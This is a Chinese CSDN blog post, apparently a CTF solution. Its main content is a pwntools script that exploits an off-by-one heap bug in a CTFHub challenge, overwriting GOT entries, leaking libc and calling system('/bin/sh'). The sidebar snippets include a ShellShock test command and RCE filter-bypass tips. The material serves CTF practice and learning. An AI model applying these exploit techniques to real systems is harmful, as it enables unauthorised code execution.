off-by-one,CTFHub例题

于 2023-01-30 09:49:28 发布
阅读量118 收藏
点赞数 2
分类专栏: PWN 文章标签: python 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128797268
版权

 慢慢更,太懒了直接给出代码

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./pwn"
io = remote("challenge-049a92ae96535d90.sandbox.ctfhub.com",31154)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23.so")

def add(size):
	io.recvuntil(b"Choice:")
	io.sendline(b"1")
	io.recvuntil(b"Size: ")
	io.sendline(str(size))

def edit(idx,data):
	io.recvuntil(b"Choice:")
	io.sendline(b"2")
	io.recvuntil(b"Index: ")
	io.sendline(str(idx))
	io.recvuntil(b"Content: ")
	io.sendline(data)


def free(idx):
	io.recvuntil(b"Choice:")
	io.sendline(b"3")
	io.recvuntil(b"Index: ")
	io.sendline(str(idx))


puts_plt = elf.plt['puts']
free_got = elf.got['free']
atoi_got = elf.got['atoi']
printf_plt = elf.plt['printf']
add(0x18)
for i in range(1,28):
	add(0x10)
add(0x21)
ptr_chunk = 0x602130-8
edit(0,b"a"*0x18+p64(0x41))
free(1)
free(2)
add(0x30)
edit(1,p64(0)*3+p64(0x21)+p64(ptr_chunk))
add(0x10)
free(30)
add(0x18)
edit(29,b"a"*8+p64(free_got)+p64(atoi_got))
edit(0,p64(puts_plt)+p64(printf_plt))
free(1)
atoi_addr = u64(io.recv(6).ljust(8,b"\x00"))
libc_addr = atoi_addr-libc.sym['atoi']
system_addr = libc_addr+libc.sym['system']
print(hex(libc_addr))
print(hex(atoi_addr))
edit(5,b"/bin/sh\x00")
edit(0,p64(system_addr)+p64(printf_plt))
# add(0x10)
free(5)


io.interactive()

saulgoodman-q
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ctfhub解题 web 信息泄露
weixin_46703850的博客
03-14 662
记录解题过程
Ctfhub解题 web RCE
weixin_46703850的博客
03-20 811
Ctfhub解题 web RCE
CTFHUB技能树(全详细解析含进阶)
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 564
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
CTFhub技能书解题笔记-Cookie
qq_43006864的博客
12-09 1459
一:打开题目,主页给出的提示是,仅仅只有admin用户,才能看到flag 二、这里我们还是打开burpsuit,抓包看一下数据包。通过对该页面进行抓包,发现了cookie位置的值为:admin=0。那么可以理解为现在是因为admin=0,所以我们非admin用户,就无法看倒flag。 这里因为0和1通常用来表示“否”和“是”,所以这里我们将0改为1。 得到flag ...
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
模拟ON-OFF开关.rar
最新发布
04-09
在电子工程领域,模拟ON-OFF开关是一种常见且至关重要的组件,它被广泛应用于各种电路设计中,包括电源管理、信号控制以及自动化系统等。这个压缩包“模拟ON-OFF开关.rar”可能包含了一些关于模拟开关的设计原理、...
华硕FORCE-OFF#信号分析
01-20
在计算机硬件系统中,强制关机信号FORCE-OFF#扮演着至关重要的角色。它是一个确保电脑安全启动和运行的关键信号,只有当该信号保持高电平时,计算机才能正常启动。相反,如果FORCE-OFF#为低电平,系统将无法启动,...
Off-Path TCP Exploits: Global Rate Limit Considered Dangerous
04-30
Off-Path TCP Exploits: Global Rate Limit Considered Dangerous
off_chain_data_off-chain数据库_HyperledgerFabric_fabric_hyperledger
10-02
了解如何使用基于对等通道的事件服务来构建用于报告和分析的脱链数据库。
kick-off-koa-workshop
06-28
"kick-off-koa-workshop" 是一个以Koa框架为主题的编程工作坊,主要关注JavaScript技术。Koa是Node.js平台上的一款轻量级Web应用框架,由Express团队成员开发,设计目的是提升开发体验和效率,强调使用现代...
CTFHUB Web题解记录(信息泄露、弱口令部分)
豆傻小饼干随记
03-18 6891
以下内容只是自己做题的一个记录,不喜勿喷 一、信息泄露 1、目录遍历 这里通过观察目录的情况,发现目录都是 /flag_in_here/1/%d 的样式,于是构造脚本 #!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- import urllib.request import urllib.re...
CTFHub技能书-Web-信息泄露类解题过程合集
爱国小白帽
03-01 1419
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理,著作权归爱国小白帽所有 目录遍历: 这个没有技术含量,一层一层找就行了 PHPINFO: 搜索关键字ctfhub{就能看到flag了 备份文件下载: 网站源码: 网站以提示了几种压缩文件后缀,猜测备份文件名是以www开头,尝试发现名为www.zip 里面有个flag文件 但点开之后发现没有 这是ctf惯用套路,访问即可 bak文件: 题目.
CTFHub技能书解题笔记-RCE-综合过滤练习
qq_43006864的博客
04-06 2998
直接开题,综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢? 估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。 这里我们慢慢绕过吧。一层层过。 首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。 进行利用,发现;可以通过%0a代替 ls执行成功,看到了flag的位置,这里cat被过滤,可以使用nl之类的代替,通过查大佬们的wp和资...
Ctfhub解题 彩蛋
weixin_46703850的博客
03-21 3379
Ctfhub解题 彩蛋1. 首页2.公众号3.题目入口4.Writeup5.工具6.赛事7.真题8.投稿提交 介绍:记录解题过程 1. 首页 听说在首页的某个地方隐藏了一个flag,可能在*.ctfhub.com中,不妨先找到flag再来开题 访问并查看源码 view-source:https://api.ctfhub.com/#/index <div id="container"> <h1>Welcome to CTFHub!</h1> <div
CTFHub ShellShock解题记录
weixin_44732566的博客
04-07 1761
CTFHub Bypass disable_function ShellShock ShellShock,破壳漏洞,出现于2014年 可以通过以下命令来判断是否存在这个漏洞 env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 如果结果中有 vulnerable说明存在这个漏洞,执行了echo vulnerable这个语句...
CTFHub HTTP协议前三题解题
qq_63575829的博客
03-31 811
请求方式 提示HTTP请求方式为GET,若改为CTFHUB将得到flag 使用burp抓包,将GET改为CTFHUB,go后得到flag 302跳转 打开题目,提示HTTP临时重定向(指的是服务器无法处理发送的请求于是跳转到了一个可以处理请求的url上,而过程不会有任何提示,使用户无法分辨是否进行了重定向) 访问网页发现give me flag的链接,点击后不会有任何反应,怀疑此环节重定向了 使用burp抓包,使用repeater重新请求,得到flag cookie ..
CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 3867
一、过滤空格 过滤了空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 7万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
CAN总线错误处理与Bus-off问题解析
节点有两种主要的计数器:错误被动计数器(Error Passive Counter)和Bus-Off计数器。当错误活跃计数器达到一定的阈值,节点进入错误被动状态,此时它不再发送错误帧,但仍然可以接收数据。如果错误持续发生,节点将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值